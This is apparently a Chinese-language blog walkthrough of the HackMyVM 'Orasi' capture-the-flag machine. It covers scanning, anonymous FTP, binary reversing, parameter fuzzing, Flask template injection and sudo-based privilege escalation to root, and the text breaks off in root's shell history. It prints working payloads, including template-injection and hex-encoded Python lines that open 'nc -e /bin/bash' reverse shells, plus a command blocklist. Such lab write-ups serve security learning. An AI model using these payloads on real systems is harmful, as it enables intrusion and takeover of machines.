{"id":869,"date":"2025-06-14T01:03:55","date_gmt":"2025-06-13T17:03:55","guid":{"rendered":"http:\/\/162.14.82.114\/?p=869"},"modified":"2025-06-14T01:03:55","modified_gmt":"2025-06-13T17:03:55","slug":"hmv-_-orasi","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/869\/06\/14\/2025\/","title":{"rendered":"hmv[-_-]Orasi"},"content":{"rendered":"

Orasi<\/h1>\n

\"image-20250613212426153\"<\/div>
\n
\"image-20250613220241510\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.101:21\nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\nOpen 192.168.10.101:5000\n\nPORT     STATE SERVICE REASON         VERSION\n21\/tcp   open  ftp     syn-ack ttl 64 vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.10.102\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 1\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_drwxr-xr-x    2 ftp      ftp          4096 Feb 11  2021 pub\n22\/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 8a:07:93:8e:8a:d6:67:fe:d0:10:88:14:61:49:5a:66 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV5JhXEPYY1iAKgsOubHh\/FgWFSavWgKUfoqiFxwB7S4qbMPCfmGLp8As9xAmjR1PUJfQE1UoyDOXOfXLIkiuba6zv6X3ga3tmdPi2trMmzVfPV3Hwk3j7OlvPSMEVYu4xgG+r80kwovwEW+OCxC04\/Ceyt5cx+X\/mFhaKjFx0+cBHs2C7vqhbUayG7M7nC4SZUz3cqrTIOJI3bSNBrPsPd\/zTRsm91LplPMiI2vleT02oeAhAzi7MgSRg3C9E+7e1fLsNrwEwuIKtB4JE6nQg1hfPi7X0nGFxfbXyC5RCv7BmHaW7kS0JRaANlCzAfpyKmdQOGcOq66ztViFl3kzl\n|   256 5a:cd:25:31:ec:f2:02:a8:a8:ec:32:c9:63:89:b2:e3 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIku5W2Uq3eZVdLWg709TyUg27nayBfklC9qnck86PqWqVepLT27d7NHZbsjORKuLqudesobRJTYlPYrm3XgpZQ=\n|   256 39:70:57:cc:bb:9b:65:50:36:8d:71:00:a2:ac:24:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFJLqSs8cALmrM4F3VHcio3IDeIHdBT+M5BrDwZp8UJU\n80\/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: OPTIONS HEAD GET POST\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: Site doesn't have a title (text\/html).\n5000\/tcp open  http    syn-ack ttl 64 Werkzeug httpd 1.0.1 (Python 3.7.3)\n|_http-server-header: Werkzeug\/1.0.1 Python\/3.7.3\n|_http-title: 404 Not Found\nMAC Address: 08:00:27:B5:33:7D (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2>\/dev\/null\n\n403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET        7l        9w       70c http:\/\/192.168.10.101\/\n200      GET        7l        9w       70c http:\/\/192.168.10.101\/index.html\n[####################] - 2m    882184\/882184  0s      found:2       errors:0      \n[####################] - 2m    882184\/882184  6285\/s  http:\/\/192.168.10.101\/ <\/code><\/pre>\n
\u670d\u52a1\u63a2\u6d4b<\/h3>\n
\u5f00\u542f\u4e86ftp<\/code>\u670d\u52a1\uff0c\u4e14\u5141\u8bb8\u533f\u540danonymous<\/code>\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ lftp $IP\nlftp 192.168.10.101:~> ls                          \ndrwxr-xr-x    2 ftp      ftp          4096 Feb 11  2021 pub\nlftp 192.168.10.101:\/> cd pub\nlftp 192.168.10.101:\/pub> ls\n-rw-r--r--    1 ftp      ftp         16976 Feb 07  2021 url\nlftp 192.168.10.101:\/pub> get url\n16976 bytes transferred           \nlftp 192.168.10.101:\/pub> exit<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
url<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ file url                                                                                                              \nurl: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=ef3648aae50173281b64e2d9f71511b1b4abb0a3, for GNU\/Linux 3.2.0, not stripped\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ strings url                                            \n\/lib64\/ld-linux-x86-64.so.2\nputs\nputchar\nprintf\nmalloc\n__cxa_finalize\n__libc_start_main\nlibc.so.6\nGLIBC_2.2.5\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_ITM_registerTMCloneTable\nu\/UH\ngfffH\ngfffH\ngfffH\n[]A\\A]A^A_\nSometimes things are not obvious\nElement found: %d\nElement not found\n[%d] -> [%c]\n;*3$"\nGCC: (Debian 10.2.1-3) 10.2.1 20201224\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.0\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nurl.c\n__FRAME_END__\n__init_array_end\n_DYNAMIC\n__init_array_start\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_csu_fini\nputchar@@GLIBC_2.2.5\n_ITM_deregisterTMCloneTable\nputs@@GLIBC_2.2.5\n_edata\ndisplay\nitem\nprintf@@GLIBC_2.2.5\nsearch\n__libc_start_main@@GLIBC_2.2.5\ntable\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n__libc_csu_init\nmalloc@@GLIBC_2.2.5\nhashCode\n__bss_start\nmain\ninsert\n__TMC_END__\n_ITM_registerTMCloneTable\n__cxa_finalize@@GLIBC_2.2.5\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.gnu.build-id\n.note.ABI-tag\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.got\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.got.plt\n.data\n.bss\n.comment<\/code><\/pre>\n
IDA<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff0cF5<\/code>\u53cd\u7f16\u8bd1\u4e00\u4e0b\uff1a<\/p>\n
int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  init = (__int64)malloc(8u);\n  *(_BYTE *)init = 111;\n  *(_DWORD *)(init + 4) = -1;\n  insert(1, 47);\n  insert(2, 115);\n  insert(42, 104);\n  insert(4, 52);\n  insert(12, 100);\n  insert(14, 48);\n  insert(17, 119);\n  insert(18, 36);\n  insert(19, 115);\n  puts("Sometimes things are not obvious");\n  item = search(18);\n  if ( item )\n    printf("Element found: %d\\n", *(char *)item);\n  else\n    puts("Element not found");\n  return 0;\n}<\/code><\/pre>\n
\u4f3c\u4e4e\u85cf\u4e86\u4e9b\u4e1c\u897f\uff0c\u8fd8\u662f\u770b\u6c47\u7f16\u5427\uff1a<\/p>\n
\"image-20250613223217072\"<\/div><\/p>\n
\u8fde\u8d77\u6765\u5c31\u662f\/sh4d0w$s<\/code>\u770b\u4e0a\u53bb\u50cf\u4e2a\u76ee\u5f55\uff0c\u770b\u4e00\u4e0bweb\u670d\u52a1\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text\n****** Orasi ******\n\n6 6 1337leet\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s http:\/\/$IP:5000 | html2text\n****** Not Found ******\nThe requested URL was not found on the server. If you entered the URL manually\nplease check your spelling and try again.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s 'http:\/\/192.168.10.101:5000\/sh4d0w$s'\nNo input<\/code><\/pre>\n
$s<\/code>\u4ee3\u8868\u7684\u662f\u4e00\u4e2a\u540d\u4e3as<\/code>\u7684\u53c2\u6570\uff0c1337leet<\/code>\u8ba9\u6211\u60f3\u8d77\u4e86Leet\u8bed<\/strong>\uff0c\u5373\u6570\u5b57\u548c\u7b26\u53f7\u66ff\u4ee3\u5b57\u6bcd\uff0c<\/p>\n
\"image-20250613230704676\"<\/div><\/p>\n
FUZZ input\u53c2\u6570<\/h3>\n
\u524d\u9762\u76846 6<\/code>\u53c2\u6570\u53ef\u80fd\u662fcrunch<\/code>\u7684\u53c2\u6570\uff0c\u7528\u6765\u5229\u75281337leet<\/code>\u751f\u6210\u6240\u6709\u53ef\u80fd\u7684\u516d\u4f4d\u6570\u5b57\u5178\u7684\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ crunch 6 6 1337leet > a                                                    \nCrunch will now generate the following amount of data: 326592 bytes\n0 MB\n0 GB\n0 TB\n0 PB\nCrunch will now generate the following number of lines: 46656 \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ head -n 10 a                                                           \n111111\n111113\n111117\n11111l\n11111e\n11111t\n111131\n111133\n111137\n11113l<\/code><\/pre>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ ffuf -u "http:\/\/$IP:5000\/sh4d0w\\$s?FUZZ=id" -w a -fw 2\n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.10.101:5000\/sh4d0w$s?FUZZ=id\n :: Wordlist         : FUZZ: \/home\/kali\/temp\/Orasi\/a\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 2\n________________________________________________\n\nl333tt                  [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 124ms]\n:: Progress: [46656\/46656] :: Job [1\/1] :: 349 req\/sec :: Duration: [0:02:28] :: Errors: 0 ::<\/code><\/pre>\n
SSTI\u53cd\u5f39shell<\/h3>\n
\u5f97\u5230\u4e86\u4e00\u4e2a\u53c2\u6570\uff0c\u770b\u4e00\u4e0b\uff0c\u53d1\u73b0\u6ca1\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s 'http:\/\/192.168.10.101:5000\/sh4d0w$s?l333tt=whoami' \nwhoami                                                                                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s 'http:\/\/192.168.10.101:5000\/sh4d0w$s?l333tt=id'    \nid<\/code><\/pre>\n
\u770b\u4e00\u4e0b\u7f51\u7ad9\u7684\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ whatweb http:\/\/192.168.10.101:5000\nhttp:\/\/192.168.10.101:5000 [404 Not Found] Country[RESERVED][ZZ], HTTPServer[Werkzeug\/1.0.1 Python\/3.7.3], IP[192.168.10.101], Python[3.7.3], Title[404 Not Found], Werkzeug[1.0.1]<\/code><\/pre>\n
\u53d1\u73b0\u662fpython<\/code>\u540e\u7aef\u7684Werkzeug<\/code>\u6846\u67b6\uff0c\u5c1d\u8bd5SSTI<\/code>\uff1a<\/p>\n
\n
https:\/\/book.hacktricks.wiki\/en\/pentesting-web\/ssti-server-side-template-injection\/index.html?highlight=SSTI#ssti-server-side-template-injection<\/a><\/p>\n
https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Server%20Side%20Template%20Injection\/Python.md<\/a><\/p>\n<\/blockquote>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ curl -s 'http:\/\/192.168.10.101:5000\/sh4d0w$s?l333tt=\\{\\{7*7\\}\\}'\n49<\/code><\/pre>\n
\u6210\u529f\uff01\uff01\uff01\u5c1d\u8bd5\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}<\/code><\/pre>\n
\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
http:\/\/192.168.10.101:5000\/sh4d0w$s?l333tt={{ self.__init__.__globals__.__builtins__.__import__('os').popen('nc -e \/bin\/bash 192.168.10.102 1234').read() }}<\/code><\/pre>\n
\"image-20250613234648008\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@orasi:\/var\/www\/html$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@orasi:\/var\/www\/html$ sudo -l\nMatching Defaults entries for www-data on orasi:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on orasi:\n    (kori) NOPASSWD: \/bin\/php \/home\/kori\/jail.php *\n(remote) www-data@orasi:\/var\/www\/html$ cat \/home\/kori\/jail.php\n<?php\narray_shift($_SERVER['argv']);\n$var = implode(" ", $_SERVER['argv']);\n\nif($var == null) die("Orasis Jail, argument missing\\n");\n\nfunction filter($var) {\n        if(preg_match('\/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\\\/)\/i', $var)) {\n                return false;\n        }\n        return true;\n}\nif(filter($var)) {\n        $result = exec($var);\n        echo "$result\\n";\n        echo "Command executed";\n} else {\n        echo "Restricted characters has been used";\n}\necho "\\n";\n?><\/code><\/pre>\n
\u7ed5\u8fc7\u9650\u5236\u547d\u4ee4\u6267\u884c<\/h3>\n
(remote) www-data@orasi:\/var\/www\/html$ sudo -u kori \/bin\/php \/home\/kori\/jail.php id\nuid=1001(kori) gid=1001(kori) groups=1001(kori)\nCommand executed<\/code><\/pre>\n
\u5f88\u591a\u65b9\u6cd5\u90fd\u53ef\u4ee5\u7ed5\u8fc7\u554a\uff0c\u6bd4\u5982revshell<\/a>\u5de5\u5177\u6328\u4e2a\u8bd5\uff0c\u54ea\u4e9b\u5de5\u5177\u80fd\u7528\u5c31\u80fd\u8fdb\u884c\u53cd\u5f39\uff0c\u6bd4\u5982python\u3001perl<\/code>\u4e4b\u7c7b\u7684\uff0c\u6216\u8005\u548c\u6211\u4e00\u6837\u6267\u884c\u811a\u672c\u3002\u3002\u3002<\/p>\n
(remote) www-data@orasi:\/tmp$ sudo -u kori \/bin\/php \/home\/kori\/jail.php "cat test | sh"\nkori\nCommand executed<\/code><\/pre>\n
\u90a3\u54b1\u4eec\u80fd\u5e72\u7684\u5c31\u591a\u4e86\u3002\u3002\u3002\u3002\u53ef\u4ee5\u8bf4\u4e0a\u9762\u6240\u6709\u7684\u90fd\u7981\u7528\u4e86\u4e2a\u5bc2\u5bde\uff0c\u751a\u81f3\u53ef\u4ee5\u8003\u8651busybox\uff0c\u65b9\u6848\u7279\u522b\u591a\uff0c\u5404\u81ea\u53d1\u6325\u5427\u3002\u3002\u3002<\/p>\n
(remote) www-data@orasi:\/tmp$ echo 'nc -e \/bin\/bash 192.168.10.102 2345' > exp\n(remote) www-data@orasi:\/tmp$ sudo -u kori \/bin\/php \/home\/kori\/jail.php "cat exp | sh"\nstty: 'standard input': Inappropriate ioctl for device\nbash: line 12: ifconfig: command not found<\/code><\/pre>\n
\"image-20250613235640273\"<\/div><\/p>\n
apk\u63d0\u53d6\u5bc6\u7801<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ pwncat-cs -lp 2345 2>\/dev\/null \n[11:55:53] Welcome to pwncat \ud83d\udc08!                                                                                                                                              __main__.py:164\n[11:56:05] received connection from 192.168.10.101:44886                                                                                                                           bind.py:84\n[11:56:05] 192.168.10.101:44886: registered new host w\/ db                                                                                                                     manager.py:957\n(local) pwncat$                                                                                                                                                                              \n(remote) kori@orasi:\/tmp$ whoami;id\nkori\nuid=1001(kori) gid=1001(kori) groups=1001(kori)\n(remote) kori@orasi:\/tmp$ echo $SHELL\n\/bin\/sh\n(remote) kori@orasi:\/tmp$ sudo -l\nMatching Defaults entries for kori on orasi:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser kori may run the following commands on orasi:\n    (irida) NOPASSWD: \/usr\/bin\/cp \/home\/irida\/irida.apk \/home\/kori\/irida.apk<\/code><\/pre>\n
\u6211\u52d2\u4e2a\u8c46\uff0c\u6211\u8fd8\u662f\u5728linux<\/code>\u5417\uff0c\u548b\u8fd8\u6765\u4e86\u4e2aapk<\/code>\u4e86\uff0c\u56e0\u4e3a\u6ca1\u6709\u522b\u7684\u9009\u9879\uff0c\u53ea\u80fd\u8fd0\u884c\u4e86\u518d\u8bf4\u3002\u3002<\/p>\n
(remote) kori@orasi:\/tmp$ sudo -u irida \/usr\/bin\/cp \/home\/irida\/irida.apk \/home\/kori\/irida.apk\n\/usr\/bin\/cp: cannot create regular file '\/home\/kori\/irida.apk': Permission denied\n(remote) kori@orasi:\/tmp$ file \/home\/kori\/irida.apk\n\/home\/kori\/irida.apk: cannot open `\/home\/kori\/irida.apk' (No such file or directory)\n(remote) kori@orasi:\/tmp$ cd ~\/\n(remote) kori@orasi:\/home\/kori$ ls -la\ntotal 20\ndrwxr-xr-x 3 kori kori 4096 Feb 11  2021 .\ndrwxr-xr-x 4 root root 4096 Feb 11  2021 ..\n-rw------- 1 kori kori    6 Feb 11  2021 .bash_history\ndrwx------ 3 kori kori 4096 Feb 11  2021 .gnupg\n-rwxr-xr-x 1 kori kori  509 Feb 11  2021 jail.php\n(remote) kori@orasi:\/home\/kori$ chmod 777 ..\/kori\n(remote) kori@orasi:\/home\/kori$ sudo -u irida \/usr\/bin\/cp \/home\/irida\/irida.apk \/home\/kori\/irida.apk\n(remote) kori@orasi:\/home\/kori$ file irida.apk \nirida.apk: regular file, no read permission<\/code><\/pre>\n
\u8fd9\u4e2a\u6279\u8fd8\u6562\u50b2\u5a07\uff0c\u76f4\u63a5\u7ed9\u4ed6\u5220\u6389\uff0c\u518d\u521b\u5efa\u4e00\u4e2a\u540c\u540d\u9ad8\u6743\u9650\u6587\u4ef6\uff0c\u91cd\u65b0\u62f7\u8d1d\uff01<\/p>\n
(remote) kori@orasi:\/home\/kori$ rm irida.apk \nrm: remove write-protected regular file 'irida.apk'? y\n(remote) kori@orasi:\/home\/kori$ touch irida.apk\n(remote) kori@orasi:\/home\/kori$ chmod 777 irida.apk \n(remote) kori@orasi:\/home\/kori$ sudo -u irida \/usr\/bin\/cp \/home\/irida\/irida.apk \/home\/kori\/irida.apk\n(remote) kori@orasi:\/home\/kori$ ls -la\ntotal 4012\ndrwxrwxrwx 3 kori kori    4096 Jun 13 12:08 .\ndrwxr-xr-x 4 root root    4096 Feb 11  2021 ..\n-rw------- 1 kori kori       6 Feb 11  2021 .bash_history\ndrwx------ 3 kori kori    4096 Feb 11  2021 .gnupg\n-rwxrwxrwx 1 kori kori 4083889 Jun 13 12:08 irida.apk\n-rwxr-xr-x 1 kori kori     509 Feb 11  2021 jail.php\n(remote) kori@orasi:\/home\/kori$ file irida.apk \nirida.apk: Zip archive data, at least v?[0] to extract<\/code><\/pre>\n
\u4f20\u5230\u672c\u5730\u968f\u4fbf\u63c9\u634f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ file irida.apk                     \nirida.apk: Android package (APK), with zipflinger virtual entry, with APK Signing Block<\/code><\/pre>\n
\u8fd8\u597d\u4e4b\u524d\u505a\u8fc7\u9006\u5411\u7684\u840c\u65b0\u9898\u76ee\uff0c\u4fee\u6539\u540e\u7f00zip<\/code>\u518d\u8fdb\u884c\u89e3\u538b\u4f7f\u7528\u5de5\u5177\u53cd\u7f16\u8bd1\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u6211\u4f7f\u7528\u7684\u662f jadx<\/code>\uff1ahttps:\/\/github.com\/skylot\/jadx<\/a> \uff0c\u5982\u679c\u9700\u8981\u53ef\u4ee5\u4e0b\u8f7d\uff0c\u5c06\u89e3\u538b\u4ee5\u540e\u7684.dex<\/code>\u4e22\u8fdb\u53bb\u5c31\u884c\u4e86\uff1a<\/p>\n
\"image-20250614004412932\"<\/div><\/p>\n
\u4e2d\u9014\u65e0\u610f\u4e2d\u7ffb\u5230\u4e86\u4ee5\u524d\u4e0b\u7684\u4e00\u6b3e\u5de5\u5177\uff1a<\/p>\n
\"image-20250614002908545\"<\/div><\/p>\n
\u90fd\u4e0d\u8bb0\u5f97\u54ea\u4e0b\u7684\u5de5\u5177\u4e86\uff0c\u4f60\u8bf4\u6709\u6bd2\u6211\u90fd\u4fe1\u3002\u3002\u3002\u3002\u3002\u8fd9\u4e2a\u5de5\u5177\u76f4\u63a5\u4e22\u8fdb\u53bb apk \u5c31\u81ea\u52a8\u53cd\u7f16\u8bd1\u4e86\u3002\uff08bushi\u6253\u5e7f\u544a\u5566\uff09<\/p>\n
\u7136\u540e\u5c31\u627e\u5230\u4e86\u5bc6\u7801\uff0c\u663e\u793a1#2#3#4#5<\/code>\uff0c\u7ed3\u5408\u4e0b\u9762\u4ee3\u7801\u5f97\u77e5\uff1a<\/p>\n
\"image-20250614004523872\"<\/div><\/p>\n
\u8fd9\u4e2a\u4ee3\u7801\u662f\u5c06\u4e94\u4e2a\u5b57\u6bb5\u76f8\u52a0\u5f97\u51fa\u5bc6\u7801eye.of.the.tiger()<\/code>\uff0c\u4e0d\u8981\u5fd8\u4e86\u4e0b\u9762\u5f62\u6210\u5bc6\u7801\u65f6\u5019\u4e2d\u95f4\u52a0\u4e86\u70b9\u54e6\uff0c\u8fd9\u4e5f\u8bb8\u662f\u4f5c\u8005\u5f00\u5934\u6015\u641e\u9519\u7ed9\u51fa\u7684\u63d0\u793a\uff1a<\/p>\n
\n
CTF like VM. Hint: Just one useless little dot.<\/p>\n<\/blockquote>\n
\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff0c\u53d1\u73b0\u6210\u529f\uff01<\/p>\n
\"image-20250614005008413\"<\/div><\/p>\n
python\u5d4c\u5165\u53cd\u5f39shell<\/h3>\n
\u9996\u5148\u8981\u6536\u96c6\u4e00\u4e0b\u4fe1\u606f\uff1a<\/p>\n
irida@orasi:~$ ls -la\ntotal 4024\ndrwxr-xr-x 3 irida irida    4096 Feb 11  2021 .\ndrwxr-xr-x 4 root  root     4096 Feb 11  2021 ..\n-rw------- 1 irida irida     465 Feb 11  2021 .bash_history\n-rw-r--r-- 1 irida irida     220 Feb 11  2021 .bash_logout\n-rw-r--r-- 1 irida irida    3526 Feb 11  2021 .bashrc\ndrwx------ 3 irida irida    4096 Feb 11  2021 .gnupg\n-rwx------ 1 irida irida 4083889 Feb 11  2021 irida.apk\n-rw-r--r-- 1 irida irida     807 Feb 11  2021 .profile\n-rw------- 1 irida irida      33 Feb 11  2021 user.txt\nirida@orasi:~$ cat user.txt \n2afb9cbb10c22dc7e154a8c434595948\nirida@orasi:~$ cat .bash_history \nexit\nwget 10.0.2.15:8080\nwget 10.0.2.15:8000\/irida.apk\nls\nls -la\nchmod 600 irida.apk\nls -la\necho "2afb9cbb10c22dc7e154a8c434595948" > user.txt\nls -la\nchmod 600 user.txt\ncat user.txt\nls -la\nwhich python3\nlocate cp\nwhich cp\nls\nls -la\nchmod 700 irida.apk\nls\nls -la\npython3 -m http.server 8000\nclear\nls\nsudo -l\nexit\nclear\nsudo -l\nsudo -u root \/usr\/bin\/python3 \/root\/oras.py\nls\ncat \/root\/root.txt\ncat \/root\/oras.py\nsudo -u root \/usr\/bin\/python3 \/root\/oras.py\nclear\nexit\nirida@orasi:~$ sudo -l\nMatching Defaults entries for irida on orasi:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser irida may run the following commands on orasi:\n    (root) NOPASSWD: \/usr\/bin\/python3 \/root\/oras.py<\/code><\/pre>\n
\u5c1d\u8bd5\u8fd0\u884c\u4e00\u4e0b\uff0c\u770b\u770b\u662f\u5e72\u5565\u7684\uff1a<\/p>\n
irida@orasi:~$ sudo -u root \/usr\/bin\/python3 \/root\/oras.py\n: whoami\nTraceback (most recent call last):\n  File "\/root\/oras.py", line 7, in <module>\n    name = bytes.fromhex(name).decode('utf-8')\nValueError: non-hexadecimal number found in fromhex() arg at position 0<\/code><\/pre>\n
\u53d1\u73b0\u4f3c\u4e4e\u4f1a\u8fdb\u884c\u89e3\u7801\uff0c\u5c1d\u8bd5\u5148\u7f16\u7801\u518d\u5c1d\u8bd5\uff1a<\/p>\n
whoami\n77686f616d69<\/code><\/pre>\n
\u7136\u540e\u62a5\u9519\uff1a<\/p>\n
irida@orasi:~$ sudo -u root \/usr\/bin\/python3 \/root\/oras.py\n: 77686f616d69             \nTraceback (most recent call last):\n  File "\/root\/oras.py", line 8, in <module>\n    print(exec(name))\n  File "<string>", line 1, in <module>\nNameError: name 'whoami' is not defined<\/code><\/pre>\n
\u5f88\u597d\uff0c\u8bf4\u660e\u88ab\u6b63\u5e38\u89e3\u6790\u4e86\uff0c\u5c1d\u8bd5\u6267\u884cpython\u547d\u4ee4\u53cd\u5f39shell\uff01\uff01\uff01<\/p>\n
\"image-20250614010028494\"<\/div><\/p>\n
irida@orasi:~$ sudo -u root \/usr\/bin\/python3 \/root\/oras.py\n: 696d706f7274206f733b6f732e73797374656d28226e63202d65202f62696e2f62617368203139322e3136382e31302e31303220333435362229\nstty: 'standard input': Inappropriate ioctl for device\nbash: line 12: ifconfig: command not found\n<\/code><\/pre>\n
\"image-20250614010014918\"<\/div><\/p>\n
\u62ff\u4e0brootshell\uff01\uff01\uff01\uff01\u987a\u4fbf\u8fd8\u80fd\u770b\u5230\u4f5c\u8005\u5f53\u521d\u521b\u5efa\u9776\u573a\u7684\u5168\u8fc7\u7a0b\uff0c\u4ee5\u540e\u8bf4\u4e0d\u5b9a\u6211\u8fd8\u80fd\u7528\u4e0a\uff01\uff01<\/p>\n
(remote) root@orasi:\/root# ls -la\ntotal 52\ndrwx------  6 root root 4096 Feb 11  2021 .\ndrwxr-xr-x 18 root root 4096 Feb 11  2021 ..\n-rw-------  1 root root 4305 Feb 11  2021 .bash_history\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Feb 11  2021 .cache\ndrwxr-xr-x  2 root root 4096 Feb 11  2021 .cron\ndrwx------  3 root root 4096 Feb 11  2021 .gnupg\ndrwxr-xr-x  3 root root 4096 Feb 11  2021 .local\n-rwx------  1 root root  126 Feb 11  2021 oras.py\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-------  1 root root   33 Feb 11  2021 root.txt\n-rw-r--r--  1 root root  180 Feb 11  2021 .wget-hsts\n(remote) root@orasi:\/root# cat .bash_history\nclear\nwhich python3\nsudo apt-get install python3-pip\napt-get install sudo\nsudo apt-get install python3-pip\npip3 install flask\nsudo apt-get install vsftpd\nsudo apt-get install php\nclear\nsudo useradd kori\npasswd kori\ncd \/home\nls\nsudo useradd -m -d \/home\/kori kori\nsudo -m -d \/home\/kori kori\nsudo mkdir \/home\/kori\ncd\nclear\nls\nsudo chown kori:kori \/home\/kori\nls -l \/home\/kori\/\nls -l \/home\/\ncat \/etc\/passwd\ncd\nclear\nsudo apt-get install vsftpd\nsudo cp \/etc\/vsftpd.conf \/etc\/vsftpd.conf.orig\nsudo mkdir -p \/var\/ftp\/pub\nsudo chown 